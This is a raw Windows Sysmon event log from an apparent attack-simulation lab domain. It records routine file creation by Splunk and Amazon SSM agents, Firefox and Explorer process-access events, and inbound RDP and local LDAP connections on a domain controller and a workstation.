09:18:13.925{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4315MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:13.799{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:13.455{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94CE7681240F42DA413CD589495B7A3,SHA256=7EC4A0684EAE93AC89D23EAF0D7220AB2228B7AE77B37759DE31B8C8AD11C598,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.885{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001051777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.885{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.885{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFfd41148.TMPMD5=DE3A0FA109221B18DF49AC1FFC6FE4B1,SHA256=ED397D4D656C29DB004817AED882B128D4456823F423CD84E3D3C39C431C5AC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.885{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+be47e3|C:\Program Files\Mozilla Firefox\xul.dll+be39b5|C:\Program Files\Mozilla Firefox\xul.dll+be9f5b 10341000x80000000000000001051774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.885{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+be47e3|C:\Program Files\Mozilla Firefox\xul.dll+be39b5|C:\Program Files\Mozilla Firefox\xul.dll+be9f5b 10341000x80000000000000001051773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.869{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+be47e3|C:\Program Files\Mozilla Firefox\xul.dll+be39b5|C:\Program Files\Mozilla Firefox\xul.dll+be9f5b 10341000x80000000000000001051772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.869{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+be47e3|C:\Program Files\Mozilla Firefox\xul.dll+be39b5|C:\Program Files\Mozilla Firefox\xul.dll+be9f5b 354300x80000000000000001051771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:10.770{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58772-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.270{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D82144921F74882EA6BE0B103876A3A,SHA256=3528A03019F630325F025174A19DF30520A5B5DF21F54137026CF305FA3AB125,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:10.828{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59459-false10.0.1.12-8000- 23542300x8000000000000000980112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:14.690{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C830CB8D466991BA243545E7BCFC19B,SHA256=2FBCC86FB2CD74E22087B266EE9DA3FC1BE08BFE4314A1005953A4E4548E27E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:14.701{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAA866EE933822522EE86A5CAE0420F,SHA256=CC0F495A038EF29907FD51ED41A9D4CA9337BD3571954A762BA6F4E851020D2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:14.631{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:14.631{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:14.300{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F810170179C884706BEE9AA251AFA6,SHA256=3230136F2B86FAC78DB0279E79D80E9927440AD76270A2E5A518FCDF810FE814,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:12.421{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59460-false10.0.1.12-8089- 23542300x8000000000000000980114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:15.737{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DCD49A60C958788BC357F28864CEBE3,SHA256=7E13925CEE71240A0D0C020B55D07B161B76C54E577A82DEB9AD5EF9000E45FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:15.786{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:15.786{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:13.074{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63636-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:12.291{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59814-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:15.353{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC5FF14B09134E50F558EB9EF3AA9B9,SHA256=641BE65BA22E4965660BF58431F425E836178778CB4987FFC1D715D2BB21FCE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:13.984{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de53468-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:16.737{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=868043BC387893DEAE96E23B44CAD12F,SHA256=BC22D467725D2DF641EB917B32FF21A11C060F3C2E95171D0A7692ED502F9AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:16.373{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAACB3FF19AD25266ECF4F33926DB5FF,SHA256=EF791B30C874D6CB3090BB72A4BFD1570EE93E4C8AFDF34368C449C9C7A2E0BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:17.753{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693A494EBD701648CF4AB4568EB721ED,SHA256=126E6C0A1BF2CF42AC4C526B917C200236A67D4153949932042A999F7C81EA5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:16.127{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53474-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001051792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:16.127{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53474-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001051791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:14.840{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53473-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:17.456{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC81D75DC6AF8A4E82A07D91AA7C32D1,SHA256=669453D83E059C4F44B89C94D0A8AEDBBC5A6FA44CF53104C38F69D6B7BAD586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:17.388{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21CF68D7F72533ED7FC61D1DA79482AA,SHA256=187FC7F6A9BEE881C34E8F38CAEE5EC49BF15EE395DDA8668D2490E9494C3E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:17.518{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8373579CB010EA922550C4FA48E2E06,SHA256=E8860E40C929ED4BAAE4490FF59B8B85D2ABC5EFAAD26540F3D50DAC64931674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:17.518{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F15CD93ED12EB7E3F86BB2AC52288DE3,SHA256=153A0675E5FABF5C5571D59DFFE6412FD0DD871B61EC3FCC6850711DBC4AC9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:18.987{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=507E7D63731B38749B6119C8F4B93EA2,SHA256=41E34D90845FB34CD4953CC8BEEEF047DAF59C21FB4240842C6D1D3B5947FD4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:18.419{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C86384726F0F894A5B2CF598F3FAA4,SHA256=F699EA488442A8087D80AB69AB74AC9629006F1318BD435595E13DA7FD27FD1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:19.434{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6999DAFBEE6C4DD01DDAF05BE2E4D57E,SHA256=C0642CEF6BC55C5CAC4E73DD7F6057DF354FEA0EA6AC8C1886B23DC26EC94839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:20.487{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C50F2F17C04C04165D5128743A18760,SHA256=ED9C966030F028D2B6B2D54D93D587EE5D77A928D16F3E0445B98D93DCFBCF05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:20.222{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C662F3F4287878EFC36854EE6D970846,SHA256=DC33C4B316ABE977BD532FD94851C5F9FBB89B9776A569404D7A6859FC656243,IMPHASH=00000000000000000000000000000000falsetrue 